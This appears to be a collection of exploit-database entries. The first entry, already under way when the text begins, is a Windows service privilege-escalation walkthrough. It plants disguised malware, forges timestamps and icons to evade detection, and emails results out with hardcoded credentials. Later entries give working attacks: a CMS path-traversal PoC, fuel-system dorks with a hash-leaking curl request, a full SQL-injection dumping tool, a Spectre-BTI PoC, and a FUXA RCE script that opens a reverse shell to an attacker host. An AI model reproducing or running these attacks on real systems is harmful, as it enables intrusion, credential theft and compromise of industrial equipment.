False UserCanStop : False [+] C:\PenTest>del PrivescCheck.ps1 * We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks. # ================================================================================================================== # [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail" Successfully processed 0 files; Failed processing 1 files C:\Program Files (x86)\Persits Software\AspEmail: Access is denied. * We do not have permission to access subdirectories. # ================================================================================================================== [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F) DeepSecLab\psacln:(I)(OI)(CI)(N) DeepSecLab\psaadm:(I)(OI)(CI)(N) DeepSecLab\psaadm_users:(I)(OI)(CI)(N) BUILTIN\Administrators:(I)(F) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX) NT SERVICE\TrustedInstaller:(I)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(OI)(CI)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX) * Unlike other directories, we have full privileges in the "BIN" directory of the service. * This is chmod 0777 - rwxrwxrwx in linux language. # ================================================================================================================== [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID __PATH \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16 [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators * We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user. # ================================================================================================================== * Now we will take ownership of this directory as we will execute our operations under the "BIN" directory. [+] C:\PenTest>whoami DeepSecLab\Hacker [+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN" SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker". [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN Successfully processed 1 files; Failed processing 0 files * Ok. All commands resulted successfully. We now have full privileges for this directory. # ================================================================================================================== * Now we will modify the EmailAgent file and inject a self-written malware. * We will be careful not to damage any files while doing this so that all transactions can be easily undone. [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe # ================================================================================================================== [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir Volume in drive C has no label. Volume Serial Number is 0C8A-5291 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin 14.04.2023 16:47 <DIR> . 14.04.2023 16:47 <DIR> .. 01.03.2004 15:55 143.360 AspEmail.dll 25.02.2004 16:23 188.416 AspUpload.dll 13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe 24.09.2003 09:22 139.264 EmailAgentCfg.cpl 24.09.2003 09:25 94.208 EmailLogger.dll 24.09.2003 09:21 167.936 Null.EmailAgent.exe 6 File(s) 745.472 bytes 2 Dir(s) 165.936.717.824 bytes free # ================================================================================================================== * We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date. [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28" [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe * And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect. * I used the Resource Tuner Console tool. >>> http://www.restuner.com/tour-resource-tuner-console.htm * This can be done easily with the Resource Tuner tool. >>> http://www.resource-editor.com/how-to-change-icons-in-exe.html >>> http://www.restuner.com/download.htm # ================================================================================================================== [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir Volume in drive C has no label. Volume Serial Number is 0C8A-5291 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin 14.04.2023 16:47 <DIR> . 14.04.2023 16:47 <DIR> .. 01.03.2004 15:55 143.360 AspEmail.dll 25.02.2004 16:23 188.416 AspUpload.dll 24.09.2003 09:21 12.288 EmailAgent.exe 24.09.2003 09:22 139.264 EmailAgentCfg.cpl 24.09.2003 09:25 94.208 EmailLogger.dll 24.09.2003 09:21 167.936 Null.EmailAgent.exe 6 File(s) 745.472 bytes 2 Dir(s) 165.936.717.824 bytes free [24.09.2003 09:21] 12.288 EmailAgent.exe [24.09.2003 09:21] 167.936 Null.EmailAgent.exe * And time manipulation is over. They look like they were uploaded at the same time long ago. # ================================================================================================================== * Now we check for my malware ownership. [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID __PATH \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28 [+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name Name DeepSecLab\Hacker EmailAgent.exe Owner: DeepSecLab\Hacker # =================================================================================================================# # # #################################################################################################################### # #[EmailAgent.cs]# # #################################################################################################################### # # # * We program this malware in such a way that when the server is reboot(when the services are restarted), # * It will be triggered and execute the codes we want, # * And then send a printout of all this to the email address we specified. # # using System; # using System.Linq; # using System.Text; # using System.Diagnostics; # using System.IO; # using System.Collections; # # Namespace CliToolSpace # { # class _Main # { # static void Main(string[] args) # { # Cli commandLine = new Cli(); # commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); # commandLine.Execute(); # commandLine.ToFile(@"C:\Windows\Temp\"); # } # } # } # # # # #################################################################################################################### # #[Mail.cs]# # #################################################################################################################### # # # using System; # using System.Net.Mail; # using System.Net; # SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); # var mail = new MailMessage(); # mail.From = new MailAddress("[email protected]"); # mail.To.Add("[email protected]"); # mail.Subject = "Trigger Successful!"; # mail.IsBodyHtml = true; # string htmlBody; # htmlBody = "<strong>This server has been rebooted.</strong>"; # mail.Body = htmlBody; # Attachment attachment; # attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); # mail.Attachments.Add(attachment); # SmtpServer.Port = 587; # SmtpServer.UseDefaultCredentials = false; # SmtpServer.Credentials = new System.Net.NetworkCredential("[email protected]","p@ssw0rd123"); # SmtpServer.EnableSsl = true; # SmtpServer.Timeout = int.MaxValue; # SmtpServer.Send(mail); # # # # #################################################################################################################### # #[Run.bat]# # #################################################################################################################### # # # whoami > C:\Windows\Temp\Export.txt # cd C:\Program Files (x86)\Persits Software\AspEmail\Bin # del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe # cd c:\Windows\Tasks # del Run.bat & del Mail.exe # # # # #################################################################################################################### # # [+]Trigger Successful![+] # # [+] C:\PenTest>systeminfo | findstr "Boot Time" # System Boot Time: 13.04.2022, 07:46:06 # # # # #################################################################################################################### #[Export.txt]# # #################################################################################################################### # # # NT AUTHORITY\SYSTEM # # # # #################################################################################################################### # # # ================================================================================================================== # ...|||[FIX]|||... # # ================================================================================================================== # [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] # # =================================================================================================================# [+] C:\Administrator>sc qc "Persits Software EmailAgent" [SC] QueryServiceConfig SUCCESS SERVICE_Name: Persits Software EmailAgent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run LOAD_ORDER_GROUP : TAG : 0 DISPLAY_Name : Persits Software EmailAgent DEPENDENCIES : rpcss SERVICE_START_Name : LocalSystem # ================================================================================================================== [+] C:\Administrator>sc sdshow "Persits Software EmailAgent" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) # ================================================================================================================== [+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula Accesschk v6.15 - Reports effective permissions for securable objects Copyright (C) 2006-2022 Mark Russinovich Sysinternals - www.sysinternals.com Persits Software EmailAgent Medium Mandatory Level (Default) [No-Write-Up] RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS # ================================================================================================================== [+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" Successfully processed 0 files; Failed processing 1 files C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied. DONE! # ================================================================================================================== [+] C:\Administrator>sc stop "Persits Software EmailAgent" [+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent" * These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore. # ==================================================================================================================

# Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure # Date : 03/27/2023 # Exploit Author : Hadi Mene # Vendor Homepage : https://www.gdidees.eu/ # Software Link : https://www.gdidees.eu/cms-1-0.html # Version : 3.9.1 and earlier # Tested on : Debian 11 # CVE : CVE-2023-27179 ### Summary: GDidees CMS v3.9.1 and lower versions was discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php. ### Description : Imgdownload.php is mainly used by the QR code generation module to download an QR code. The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized. Furthermore, there is no admin session check in this code as it should since only the admin user should normally be able to download QR code. Vulnerable Code : 3. if (isset($_GET["filename"])) { 4. $filename=$_GET["filename"]; ..... ..... 27. @readfile($filename) OR die(); ### POC : URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd Exploitation using curl # curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin ntp:x:104:110::/nonexistent:/usr/sbin/nologin messagebus:x:105:111::/nonexistent:/usr/sbin/nologin uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin vboxadd:x:998:1::/var/run/vboxadd:/bin/false openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false ### References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179 https://nvd.nist.gov/vuln/detail/CVE-2023-27179 https://www.exploit-db.com/papers/12883

# Exploit Title: Franklin Fueling Systems TS-550 - Default Password # Date: 4/16/2023 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/) # Version: TS-550 # Tested on: Linux/Android(termux) Step 1 : attacker can using these dorks and access to find the panel inurl:"relay_status.html" inurl:"fms_compliance.html" inurl:"fms_alarms.html" inurl:"system_status.html" inurl:"system_reports.html' inurl:"tank_status.html" inurl:"sensor_status.html" inurl:"tank_control.html" inurl:"fms_reports.html" inurl:"correction_table.html" Step 2 : attacker can send request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi Step 3 : if get response that show like this <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION> <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/> <ROLE_LIST> <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/> <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/> <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/> </ROLE_LIST> Step 4 : attacker can crack the hashesh using john the ripper notice : most of the panels password is : admin Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

#!/usr/bin/python3 ####################################################### # # # Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection # # Date: 2023/04/13 # # ExploitAuthor: msd0pe # # Project: https://github.com/waqaskanju/Chitor-CMS # # My Github: https://github.com/msd0pe-1 # # Patched the 2023/04/16: 69d3442 commit # # # ####################################################### __description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.' __author__ = 'msd0pe' __version__ = '1.1' __date__ = '2023/04/13' class bcolors: PURPLE = '\033[95m' BLUE = '\033[94m' GREEN = '\033[92m' OCRA = '\033[93m' RED = '\033[91m' CYAN = '\033[96m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' class infos: INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] " ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] " GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] " PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] " import re import requests import optparse from prettytable import PrettyTable def DumpTable(url, database, table): header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} x = PrettyTable() columns = [] payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: columns.append(i) pass except: pass x.field_names = columns payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: i = i.split("xzmdpl") x.add_rows([i]) except ValueError: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: i = i.split("xzmdpl") i.append("") x.add_rows([i]) print(x) def ListTables(url, database): header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} x = PrettyTable() x.field_names = ["TABLES"] payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: x.add_row([i]) except: pass print(x) def ListDatabases(url): header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} x = PrettyTable() x.field_names = ["DATABASES"] payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: x.add_row([i]) except: pass print(x) def Main(): Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__) Menu.add_option('-u', '--url', type="str", dest="url", help='target url') Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases') Menu.add_option('-D', '--db', type="str", dest="database", help='select a database') Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables') Menu.add_option('-T', '--table', type="str", dest="table", help='select a table') Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content') (options, args) = Menu.parse_args() Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump """) Menu.add_option_group(Examples) if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}: Menu.print_help() print('') print(' %s' % __description__) print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC) print(' Any malicious or illegal activity may be punishable by law') print(' Use at your own risk') elif len(args) == 0: try: if options.url != None: if options.l_databases != None: ListDatabases(options.url) if options.database != None: if options.l_tables != None: ListTables(options.url, options.database) if options.table != None: if options.dump != None: DumpTable(options.url, options.database, options.table) except: print("Unexpected error") if __name__ == '__main__': try: Main() except KeyboardInterrupt: print() print(infos.PROCESS + "Exiting...") print() exit(1)

## Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation ## Exploit Author: nu11secur1ty ## CVE ID: CVE-2023-1998 ## Description ## Summary The Linux kernel allows userspace processes to enable mitigations by calling prctl with [PR_SET_SPECULATION_CTRL](https://docs.kernel.org/userspace-api/spec_ctrl.html) which disables the speculation feature as well as by using seccomp. We had noticed that on VMs of at least one major cloud provider, the kernel still left the victim process exposed to attacks in some cases even after enabling the spectre-BTI mitigation with prctl. The same beahaviour can be observed on a bare-metal machine when forcing the mitigation to IBRS on boot comand line. This happened because when plain IBRS was enabled (not enhanced IBRS), the kernel had some logic that determined that [STIBP](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/single-thread-indirect-branch-predictors.html) was not needed. The IBRS bit implicitly protects against cross-thread branch target injection. However, with legacy [IBRS](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html), the IBRS bit was cleared on returning to userspace, due to performance reasons, which disabled the implicit STIBP and left userspace threads vulnerable to cross-thread branch target injection against which STIBP protects. ## Severity Medium - The kernel failed to protect applications that attempted to protect against Spectre v2 leaving them open to attack from other processes running on the same physical core in another hyperthread. ## Vulnerable code The Bug present on Kernel 6.2 (https://elixir.bootlin.com/linux/v6.2/source/arch/x86/kernel/cpu/bugs.c#L1196) implements an optimization that disables STIBP if the mitgation is IBRS or eIBRS. However IBRS doesn't mitigate SMT attacks on userspace as eIBRS does. Setting spectre_v2=ibrs on kernel boot parameters for bare metal machines without eIBRS support also triggers the bug. ```c /* * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible, * STIBP is not required. */ if (!boot_cpu_has(X86_FEATURE_STIBP) || !smt_possible || spectre_v2_in_ibrs_mode(spectre_v2_enabled)) return; ``` ## Proof of Concept The test consists of two processes. The attacker constantly poisons an indirect call to speculatively redirect it to a target address. The victim process measures the mispredict rate and tries to mitigate the attack either by calling PRCTL or writing to the MSR directly using a kernel module that exposes MSR read and write operations to userspace. ```c /* gcc -o victim test.c -O0 -masm=intel -w -DVICTIM gcc -o victim-PRCTL test.c -O0 -masm=intel -w -DVICTIM -DPRCTL gcc -o victim-nospecctrl test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=0 gcc -o victim-IBRS test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=1 gcc -o victim-STIBP test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=2 gcc -o victim-IBPB test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=0 -DIBPB gcc -o attacker test.c -O0 -masm=intel -w */ #include "utils.h" #include <stdio.h> #include <string.h> #include <sys/prctl.h> #ifndef PRINT_AMMOUNT #define PRINT_AMMOUNT 1000 #endif #define IA32_SPEC_CTRL 72 uint8_t *rdiPtr; uint8_t unused[0x500]; uint8_t probeArray[0x1000] = {2}; uint8_t unuse2[0x500]; uint32_t f1() {} int poison(uint8_t *srcAddress, uint8_t *dstAddress, uint64_t cpu) { volatile uint8_t d; unsigned tries = 0; unsigned hits = 0; unsigned totalHits = 0; unsigned totalTries = 0; jitForLoop(srcAddress); while (1) { #ifndef VICTIM callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray); continue; #else #ifdef IBPB wrmsr_on_cpu(73, cpu, 1); #endif for (int i = 0; i < 100; i++) { d = *dstAddress; flush((uint8_t *)&rdiPtr); callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray); } if (probe(&probeArray[0]) < THRESHOLD) { hits++; totalHits++; } totalTries++; if (++tries % PRINT_AMMOUNT == 0) { printf("Rate: %u/%u MSR[72]=%d\n", hits, tries,rdmsr_on_cpu(IA32_SPEC_CTRL,cpu)); #ifdef MSR wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL); #endif tries = 0; hits = 0; if (totalTries >= PRINT_AMMOUNT * 10) { break; } } usleep(1); #endif } printf("Total mispredict rate: %d/%d (%.2f %)\n", totalHits, totalTries, (float)totalHits * 100 / (float)totalTries); } int main(int argc, char **argv) { uint64_t srcAddress; uint64_t dstAddress; uint64_t cpu; if (argc < 4) { printf("Usage: %s <srcAddress> <dstAddress> <cpuCore> \n", argv[0]); printf("Example: %s 0x55555554123 0x55555555345 1 \n", argv[0]); return 0; } srcAddress = (uint64_t)strtoull(argv[1], NULL, 16); dstAddress = (uint64_t)strtoull(argv[2], NULL, 16); cpu = (uint64_t)strtoull(argv[3], NULL, 16); SetCoreAffinity(cpu); uint8_t *rwx1 = requestMem((uint8_t *)(srcAddress & (~0xfffULL)), 0x1000); uint8_t *rwx2 = requestMem((uint8_t *)(dstAddress & (~0xfffULL)), 0x1000); #ifdef PRCTL if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, 0, 0) != 0) { perror("prctl"); } printf("PRCTL GET value 0x%x\n", prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, 0, 0, 0)); #endif #ifdef MSR printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu); wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL); printf("writing msr[%d]=%d on core %d \n", IA32_SPEC_CTRL, MSR_VAL, cpu); printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu); #endif // set up leak gadget into position #ifdef VICTIM rdiPtr = (uint8_t *)f1; copyLeakGadget(dstAddress); #else rdiPtr = (uint8_t *)dstAddress; copyRetGadget(dstAddress); #endif poison(srcAddress, dstAddress, cpu); #ifdef MSR printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu); #endif } ``` Timeline **Date reported** to Cloud providers: 31/12/2022 **Date reported** to [email protected]: 20/02/2022 **Date fixed:** 10/03/2023 - [torvalds/linux@6921ed9](https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d) - https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d Date disclosed: 12/04/2023 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE) # Date: 18/04/2023 # Exploit Author: Rodolfo Mariano # Vendor Homepage: https://github.com/frangoteam/FUXA # Version: FUXA V.1.1.13-1186 (current) from argparse import RawTextHelpFormatter import argparse, sys, threading, requests def main(rhost, rport, lhost, lport): url = "http://"+rhost+":"+rport+"/api/runscript" payload = { "headers": { "normalizedNames":{}, "lazyUpdate": "null" }, "params":{ "script":{ "parameters":[ { "name":"ok", "type":"tagid", "value":"" } ], "mode":"", "id":"", "test":"true", "name":"ok", "outputId":"", "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport) } } } response = requests.post(url, json=payload) args = None parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>") parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost') parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881) parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost') parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport') args=parser.parse_args() main(args.rhost, args.rport, args.lhost, args.lport)

